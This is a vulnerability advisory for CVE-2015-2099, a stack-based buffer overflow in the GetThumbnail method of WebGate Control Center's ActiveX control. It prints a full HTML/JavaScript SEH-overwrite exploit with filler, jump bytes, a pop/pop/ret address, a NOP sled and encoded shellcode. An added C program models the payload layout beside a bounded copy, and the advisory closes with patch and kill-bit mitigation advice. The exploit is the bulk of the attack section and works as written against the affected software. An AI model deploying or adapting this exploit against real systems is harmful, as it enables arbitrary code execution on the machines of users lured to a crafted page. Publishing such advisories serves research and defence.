WebGate Control Center 4.8.7 GetThumbnail Stack Overflow Vulnerability
Release date:
Updated on:
Affected Systems:
Webgate WebGate Control Center 4.8.7
Webgate WebGate Control Center
Description:
CVE (CAN) ID: CVE-2015-2099
WebGate Control Center is the central monitoring application for WebGate network video surveillance devices.
The WESPPlayback.WESPPlaybackCtrl.1 ActiveX control that ships with it contains a stack-based buffer overflow. The GetThumbnail method copies attacker-controlled data (the SiteSerialNumber string argument) into a fixed-size stack buffer without checking its length, so an oversized argument overwrites the stack, including the SEH registration record, and lets a remote attacker who lures a user to a crafted page execute arbitrary code in the context of the browser.
<* Source: rgod (rgod@autistici.org)
Link: http://www.zerodayinitiative.com/advisories/ZDI-15-063/
*>
Test method:
Warning:
The following procedure (method) may be offensive and is intended only for security research and teaching. Use it at your own risk.
<html>
<!--
Author: Praveen Darshanam
http://blog.disects.com/
http://darshanams.blogspot.com
# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)
# Date: Maid, 2015
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/
# Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35
# Version: Control Center 4.8.7
# Tested on: Windows XP SP3 using IE 6/7/8
# CVE: 2015-2099
TargetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"
Prototype = "Sub GetThumbnail(ByVal SiteSerialNumber As String, ByVal Channel As Integer, ByVal secTime As Long, ByVal miliTime As Integer)"
ProgID = "WESPPLAYBACKLib.WESPPlaybackCtrl"
-->
<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='getthumb'>
</object>
<script>
var buff1 = "";
var arg2 = 1;
var arg3 = 1;
var arg4 = 1;
var nops = "";
var buff2 = "";
// 24 bytes of filler reach the SEH registration record
for (i = 0; i < 24; i++)
{
    buff1 += "B";
}
// nSEH: jmp short +8 skips the handler address and lands in the NOP sled
nseh = "\xeb\x08PD";
// SEH handler: pop/pop/ret at 0x1007f2a0 (little-endian)
var seh = "\xa0\xf2\x07\x10";
for (i = 0; i < 80; i++)
{
    nops += "\x90";
}
// calc.exe payload
sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +
"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +
"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +
"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +
"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +
"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +
"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +
"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +
"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +
"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +
"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +
"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +
"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +
"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +
"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +
"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +
"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +
"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +
"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +
"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +
"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +
"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +
"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +
"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +
"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +
"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +
"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +
"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +
"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +
"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +
"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +
"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +
"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";
// intended to pad the argument out to 5000 bytes (the appended string is empty as printed here, so this loop adds nothing)
for (i = 0; i < (5000 - (buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)
{
    buff2 += "";
}
fbuff = buff1 + nseh + seh + nops + sc + buff2;
getthumb.GetThumbnail(fbuff, arg2, arg3, arg4);
</script>
</html>
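The following C program is an added example and is not code from the advisory, the PoC author, or the vendor. It models the two things the description and the PoC above rely on: how the PoC's string (24 filler bytes, then nSEH, then the pop/pop/ret address, then a NOP sled and shellcode) lands on an x86 stack frame whose fixed-size local buffer sits directly below the SEH registration record, and what the unbounded copy in GetThumbnail looks like next to a length-checked one. The 24-byte buffer size, the frame layout, and the function names are assumptions chosen to match the PoC's offsets; the real layout of the WESPPlayback.dll frame is not documented on this page. The frame is a plain struct and the copy stays inside it, so the overwrite is modelled without undefined behaviour.

```c
/* Added example: models the SEH overwrite from the PoC above. Buffer size,
 * frame layout and function names are assumptions, not WESPPlayback.dll's. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LOCAL_BUF   24            /* assumed: the PoC places nSEH at offset 24 */
#define POP_POP_RET 0x1007f2a0u   /* "\xa0\xf2\x07\x10" from the PoC, little-endian */

/* Simplified x86 SEH registration record (_EXCEPTION_REGISTRATION_RECORD). */
struct seh_record {
    uint32_t next;     /* overwritten with the nSEH bytes "\xeb\x08PD" */
    uint32_t handler;  /* overwritten with the pop/pop/ret address */
};

/* Assumed vulnerable frame: local buffer immediately below the SEH record. */
struct frame {
    char buf[LOCAL_BUF];
    struct seh_record seh;
    uint8_t above[16]; /* bytes past the record: start of the NOP sled */
};

/* Build the PoC's layout: filler, nSEH (jmp short +8), handler, sled, shellcode.
 * Returns the payload length, or 0 if it does not fit in out. */
size_t build_payload(uint8_t *out, size_t cap, const uint8_t *sc, size_t sc_len, size_t sled)
{
    size_t n = 0;
    if (cap < LOCAL_BUF + 8 + sled + sc_len) return 0;
    memset(out + n, 'B', LOCAL_BUF); n += LOCAL_BUF;
    memcpy(out + n, "\xeb\x08PD", 4); n += 4;          /* jmp short +8, two filler bytes */
    for (int i = 0; i < 4; i++)                        /* x86 stores the address LSB first */
        out[n++] = (uint8_t)(POP_POP_RET >> (8 * i));
    memset(out + n, 0x90, sled); n += sled;
    memcpy(out + n, sc, sc_len); n += sc_len;
    return n;
}

/* The bug pattern from the advisory: the copy ignores buf's size, so bytes
 * 24..31 of the payload replace the SEH record. (Clamped to the struct so the
 * model itself stays well-defined.) */
void copy_unbounded(struct frame *f, const uint8_t *src, size_t len)
{
    if (len > sizeof *f) len = sizeof *f;
    memcpy(f, src, len);
}

/* Hardened form: refuse anything that does not fit the local buffer. */
int copy_bounded(struct frame *f, const uint8_t *src, size_t len)
{
    if (len > sizeof f->buf) return -1;
    memcpy(f->buf, src, len);
    return 0;
}

/* Offset (from the start of the payload) where the nSEH short jump lands:
 * EB rel8 is relative to the next instruction, i.e. nseh_off + 2 + 8. */
size_t jmp_short_target(size_t nseh_off)
{
    return nseh_off + 2 + 0x08;
}

int main(void)
{
    /* Constructed stand-in for the shellcode: first four bytes of the PoC's payload. */
    const uint8_t sc[] = { 0x54, 0x5d, 0xda, 0xc9 };
    uint8_t payload[256];
    size_t n = build_payload(payload, sizeof payload, sc, sizeof sc, 80);
    struct frame f;
    memset(&f, 0, sizeof f);
    copy_unbounded(&f, payload, n);
    printf("payload %zu bytes; handler now 0x%08x; nSEH byte 0x%02x; jmp lands at offset %zu\n",
           n, f.seh.handler, f.seh.next & 0xff, jmp_short_target(LOCAL_BUF));
    printf("bounded copy of the same payload: %d\n", copy_bounded(&f, payload, n));
    return 0;
}
```

With a 24-byte buffer the jump target is offset 34: it skips the two filler bytes after the opcode and the four handler bytes, and lands two bytes into the 80-byte sled, which is why the sled rather than the shellcode has to follow the handler address. Any frame whose buffer is not exactly 24 bytes would put the handler bytes elsewhere, so the offset is the first thing to re-derive when porting this layout.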
Suggestion:
Vendor patch:
Webgate
-------
The vendor has released a patch for this security problem. Download it from the vendor's homepage:
http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=35
Until the patch is applied, setting the kill bit for CLSID {4E14C449-A61A-4BF7-8082-65A91298A6D8} in Internet Explorer's ActiveX Compatibility Flags prevents web pages from instantiating the vulnerable control.